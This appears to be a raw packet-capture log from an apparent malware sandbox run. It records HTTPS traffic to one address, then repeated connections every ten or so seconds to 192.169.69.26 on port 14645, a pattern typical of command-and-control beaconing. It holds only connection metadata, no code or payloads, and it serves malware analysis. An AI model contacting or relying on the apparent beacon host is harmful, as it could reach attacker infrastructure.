Dec 11, 2024 11:23:30.376559973 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.379966974 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.380052090 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.385387897 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.385462046 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.391283035 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.391334057 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.397351980 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.397422075 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.400552988 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.400609970 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.405026913 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.405090094 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.409470081 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.409521103 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.414057016 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.414114952 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.416549921 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.416603088 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.425065041 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.425122976 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.429562092 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.429636955 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.435147047 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.435210943 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.437800884 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.437859058 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.443227053 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.443288088 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.448363066 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.448434114 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.452405930 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.452470064 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.455110073 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.455171108 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.461462975 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.461522102 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.464159012 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.464224100 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.485331059 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.485379934 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.489078045 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.489128113 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.491858959 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.491911888 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.560452938 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.560461044 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.560486078 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.560556889 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.560565948 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.560595989 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.575493097 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.575510025 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.575575113 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.575581074 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.586421967 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.586435080 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.586497068 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.586503029 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.598557949 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.598586082 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.598701000 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.598707914 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.609049082 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.609062910 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.609143019 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.609149933 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.618859053 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.618872881 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.618940115 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.618946075 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.625538111 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.625551939 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.625612974 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.625618935 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.632191896 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.632205963 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.632265091 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.632270098 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.675386906 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.749165058 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.749174118 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.749207020 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.749274969 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.749281883 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.749325037 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.755841970 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.755858898 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.755923986 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.755929947 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.755970001 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.761585951 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.761600971 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.761661053 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.761667013 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.761713982 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.768136978 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.768151045 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.768205881 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.768212080 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.768255949 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.774137974 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.774152040 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.774240017 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.774245024 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.774297953 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.780786037 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.780801058 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.780878067 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.780884027 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.780922890 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.787199974 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.787214994 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.787288904 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.787293911 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.787360907 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.793179989 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.793199062 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.793275118 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.793279886 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.793322086 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.941432953 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.941456079 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.941564083 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.941570044 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.941602945 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.947104931 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.947119951 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.947189093 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.947194099 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.947235107 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.953613997 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.953628063 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.953687906 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.953691006 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.953737974 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.960148096 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.960164070 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.960216999 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.960222006 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.960258961 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.966229916 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.966244936 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.966303110 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.966308117 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.966346979 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.972740889 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.972759962 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.972801924 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.972806931 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.972829103 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.972847939 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.978486061 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.978508949 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.978562117 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.978568077 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.978604078 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.984980106 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.984996080 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.985044956 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:30.985049963 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:30.985083103 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:31.145731926 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:31.145750999 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:31.145823956 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:31.145831108 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:31.145864010 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:31.152124882 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:31.152142048 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:31.152215958 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:31.152221918 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:31.152259111 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:31.158659935 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:31.158674002 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:31.158734083 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:31.158739090 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:31.158775091 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:31.159666061 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:31.159744024 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:31.159746885 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:31.159756899 CET	443	49759	104.21.84.67	192.168.2.6
Dec 11, 2024 11:23:31.159811020 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:31.160083055 CET	49759	443	192.168.2.6	104.21.84.67
Dec 11, 2024 11:23:31.564035892 CET	49765	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:23:31.683322906 CET	14645	49765	192.169.69.26	192.168.2.6
Dec 11, 2024 11:23:31.683394909 CET	49765	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:23:31.688806057 CET	49765	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:23:31.808082104 CET	14645	49765	192.169.69.26	192.168.2.6
Dec 11, 2024 11:23:42.070377111 CET	14645	49765	192.169.69.26	192.168.2.6
Dec 11, 2024 11:23:42.070450068 CET	49765	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:23:42.070512056 CET	49765	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:23:42.190222979 CET	14645	49765	192.169.69.26	192.168.2.6
Dec 11, 2024 11:23:43.082679987 CET	49793	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:23:43.201888084 CET	14645	49793	192.169.69.26	192.168.2.6
Dec 11, 2024 11:23:43.205301046 CET	49793	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:23:43.209165096 CET	49793	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:23:43.328870058 CET	14645	49793	192.169.69.26	192.168.2.6
Dec 11, 2024 11:23:53.595571041 CET	14645	49793	192.169.69.26	192.168.2.6
Dec 11, 2024 11:23:53.595653057 CET	49793	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:23:53.595738888 CET	49793	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:23:53.715135098 CET	14645	49793	192.169.69.26	192.168.2.6
Dec 11, 2024 11:23:54.598953009 CET	49823	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:23:54.720889091 CET	14645	49823	192.169.69.26	192.168.2.6
Dec 11, 2024 11:23:54.720973015 CET	49823	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:23:54.724672079 CET	49823	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:23:54.846652985 CET	14645	49823	192.169.69.26	192.168.2.6
Dec 11, 2024 11:24:05.016730070 CET	14645	49823	192.169.69.26	192.168.2.6
Dec 11, 2024 11:24:05.016799927 CET	49823	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:24:05.016880989 CET	49823	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:24:05.136909008 CET	14645	49823	192.169.69.26	192.168.2.6
Dec 11, 2024 11:24:06.020045042 CET	49851	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:24:06.139286995 CET	14645	49851	192.169.69.26	192.168.2.6
Dec 11, 2024 11:24:06.139393091 CET	49851	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:24:06.142915010 CET	49851	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:24:06.262202024 CET	14645	49851	192.169.69.26	192.168.2.6
Dec 11, 2024 11:24:16.489042997 CET	14645	49851	192.169.69.26	192.168.2.6
Dec 11, 2024 11:24:16.489152908 CET	49851	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:24:16.489206076 CET	49851	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:24:16.608452082 CET	14645	49851	192.169.69.26	192.168.2.6
Dec 11, 2024 11:24:17.504466057 CET	49879	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:24:17.623851061 CET	14645	49879	192.169.69.26	192.168.2.6
Dec 11, 2024 11:24:17.623946905 CET	49879	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:24:17.627537966 CET	49879	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:24:17.746767998 CET	14645	49879	192.169.69.26	192.168.2.6
Dec 11, 2024 11:24:27.937653065 CET	14645	49879	192.169.69.26	192.168.2.6
Dec 11, 2024 11:24:27.937721014 CET	49879	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:24:27.937803984 CET	49879	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:24:28.057050943 CET	14645	49879	192.169.69.26	192.168.2.6
Dec 11, 2024 11:24:28.942044973 CET	49907	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:24:29.061393023 CET	14645	49907	192.169.69.26	192.168.2.6
Dec 11, 2024 11:24:29.061511040 CET	49907	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:24:29.065036058 CET	49907	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:24:29.184242010 CET	14645	49907	192.169.69.26	192.168.2.6
Dec 11, 2024 11:24:39.404371023 CET	14645	49907	192.169.69.26	192.168.2.6
Dec 11, 2024 11:24:39.404581070 CET	49907	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:24:39.404778957 CET	49907	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:24:39.523992062 CET	14645	49907	192.169.69.26	192.168.2.6
Dec 11, 2024 11:24:40.719368935 CET	49938	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:24:40.838622093 CET	14645	49938	192.169.69.26	192.168.2.6
Dec 11, 2024 11:24:40.838798046 CET	49938	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:24:40.842042923 CET	49938	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:24:40.961318970 CET	14645	49938	192.169.69.26	192.168.2.6
Dec 11, 2024 11:24:51.201549053 CET	14645	49938	192.169.69.26	192.168.2.6
Dec 11, 2024 11:24:51.203478098 CET	49938	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:24:51.203533888 CET	49938	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:24:51.325159073 CET	14645	49938	192.169.69.26	192.168.2.6
Dec 11, 2024 11:24:52.214627028 CET	49965	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:24:52.333941936 CET	14645	49965	192.169.69.26	192.168.2.6
Dec 11, 2024 11:24:52.334055901 CET	49965	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:24:52.337785006 CET	49965	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:24:52.458472967 CET	14645	49965	192.169.69.26	192.168.2.6
Dec 11, 2024 11:25:02.709534883 CET	14645	49965	192.169.69.26	192.168.2.6
Dec 11, 2024 11:25:02.711339951 CET	49965	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:25:02.711384058 CET	49965	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:25:02.830620050 CET	14645	49965	192.169.69.26	192.168.2.6
Dec 11, 2024 11:25:03.723120928 CET	49992	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:25:03.842499971 CET	14645	49992	192.169.69.26	192.168.2.6
Dec 11, 2024 11:25:03.842622995 CET	49992	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:25:03.846136093 CET	49992	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:25:03.965517044 CET	14645	49992	192.169.69.26	192.168.2.6
Dec 11, 2024 11:25:14.226075888 CET	14645	49992	192.169.69.26	192.168.2.6
Dec 11, 2024 11:25:14.227524996 CET	49992	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:25:14.227583885 CET	49992	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:25:14.346935987 CET	14645	49992	192.169.69.26	192.168.2.6
Dec 11, 2024 11:25:15.239197016 CET	50003	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:25:15.359322071 CET	14645	50003	192.169.69.26	192.168.2.6
Dec 11, 2024 11:25:15.359402895 CET	50003	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:25:15.364419937 CET	50003	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:25:15.484486103 CET	14645	50003	192.169.69.26	192.168.2.6
Dec 11, 2024 11:25:25.659322023 CET	14645	50003	192.169.69.26	192.168.2.6
Dec 11, 2024 11:25:25.659400940 CET	50003	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:25:25.659482956 CET	50003	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:25:25.779649019 CET	14645	50003	192.169.69.26	192.168.2.6
Dec 11, 2024 11:25:26.661173105 CET	50004	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:25:26.782011032 CET	14645	50004	192.169.69.26	192.168.2.6
Dec 11, 2024 11:25:26.782121897 CET	50004	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:25:26.786104918 CET	50004	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:25:26.907141924 CET	14645	50004	192.169.69.26	192.168.2.6
Dec 11, 2024 11:25:37.107477903 CET	14645	50004	192.169.69.26	192.168.2.6
Dec 11, 2024 11:25:37.107533932 CET	50004	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:25:37.107603073 CET	50004	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:25:37.226872921 CET	14645	50004	192.169.69.26	192.168.2.6
Dec 11, 2024 11:25:38.113964081 CET	50006	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:25:38.237839937 CET	14645	50006	192.169.69.26	192.168.2.6
Dec 11, 2024 11:25:38.237910032 CET	50006	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:25:38.242049932 CET	50006	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:25:38.362637043 CET	14645	50006	192.169.69.26	192.168.2.6
Dec 11, 2024 11:25:48.643724918 CET	14645	50006	192.169.69.26	192.168.2.6
Dec 11, 2024 11:25:48.643825054 CET	50006	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:25:48.643910885 CET	50006	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:25:48.763151884 CET	14645	50006	192.169.69.26	192.168.2.6
Dec 11, 2024 11:25:49.980026960 CET	50008	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:25:50.099287033 CET	14645	50008	192.169.69.26	192.168.2.6
Dec 11, 2024 11:25:50.099359989 CET	50008	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:25:50.102833986 CET	50008	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:25:50.222146034 CET	14645	50008	192.169.69.26	192.168.2.6
Dec 11, 2024 11:26:00.423644066 CET	14645	50008	192.169.69.26	192.168.2.6
Dec 11, 2024 11:26:00.424029112 CET	50008	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:26:00.424029112 CET	50008	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:26:00.544397116 CET	14645	50008	192.169.69.26	192.168.2.6
Dec 11, 2024 11:26:01.426481962 CET	50009	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:26:01.546123028 CET	14645	50009	192.169.69.26	192.168.2.6
Dec 11, 2024 11:26:01.546248913 CET	50009	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:26:01.549504995 CET	50009	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:26:01.670239925 CET	14645	50009	192.169.69.26	192.168.2.6
Dec 11, 2024 11:26:11.961014986 CET	14645	50009	192.169.69.26	192.168.2.6
Dec 11, 2024 11:26:11.961119890 CET	50009	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:26:11.961205959 CET	50009	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:26:12.080460072 CET	14645	50009	192.169.69.26	192.168.2.6
Dec 11, 2024 11:26:12.973351002 CET	50010	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:26:13.092670918 CET	14645	50010	192.169.69.26	192.168.2.6
Dec 11, 2024 11:26:13.093414068 CET	50010	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:26:13.096757889 CET	50010	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:26:13.215982914 CET	14645	50010	192.169.69.26	192.168.2.6
Dec 11, 2024 11:26:23.538032055 CET	14645	50010	192.169.69.26	192.168.2.6
Dec 11, 2024 11:26:23.541404963 CET	50010	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:26:23.541588068 CET	50010	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:26:23.660825014 CET	14645	50010	192.169.69.26	192.168.2.6
Dec 11, 2024 11:26:24.551435947 CET	50012	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:26:24.670722961 CET	14645	50012	192.169.69.26	192.168.2.6
Dec 11, 2024 11:26:24.670840979 CET	50012	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:26:24.674367905 CET	50012	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:26:24.793827057 CET	14645	50012	192.169.69.26	192.168.2.6
Dec 11, 2024 11:26:35.054543018 CET	14645	50012	192.169.69.26	192.168.2.6
Dec 11, 2024 11:26:35.057420969 CET	50012	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:26:35.057482958 CET	50012	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:26:35.176939964 CET	14645	50012	192.169.69.26	192.168.2.6
Dec 11, 2024 11:26:36.067084074 CET	50013	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:26:36.186618090 CET	14645	50013	192.169.69.26	192.168.2.6
Dec 11, 2024 11:26:36.186691046 CET	50013	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:26:36.190004110 CET	50013	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:26:36.309595108 CET	14645	50013	192.169.69.26	192.168.2.6
Dec 11, 2024 11:26:46.560415030 CET	14645	50013	192.169.69.26	192.168.2.6
Dec 11, 2024 11:26:46.560481071 CET	50013	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:26:46.560518026 CET	50013	14645	192.168.2.6	192.169.69.26
Dec 11, 2024 11:26:46.679815054 CET	14645	50013	192.169.69.26	192.168.2.6
Dec 11, 2024 11:26:47.567950010 CET	50015	14645	192.168.2.6	192.169.69.26
